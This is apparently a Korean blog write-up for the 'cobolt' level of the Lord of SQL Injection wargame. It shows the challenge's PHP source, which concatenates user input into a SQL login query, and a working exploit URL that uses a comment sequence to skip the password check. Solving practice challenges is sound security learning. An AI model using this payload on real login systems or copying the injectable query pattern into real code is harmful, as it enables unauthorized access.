본문 바로가기
lord of sql injection

[Lord of sql injeciton] cobolt

by skyepodium 2023. 5. 5.

1. 개요

...

 

2. 분석

id가 admin 이고, md5 부분은 주석으로 처리할 수 있을것 같습니다.

<?php
  include "./config.php"; 
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id'] == 'admin') solve("cobolt");
  elseif($result['id']) echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>"; 
  highlight_file(__FILE__); 
?>

 

3. exploit

https://los.rubiya.kr/chall/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin%27%20%20--%20&pw=asdf

 

 

 

'lord of sql injection' 카테고리의 다른 글

[Lord of sql injeciton] goblin  (0) 2023.05.05
[Lord of sql injeciton] gremlin  (0) 2023.05.05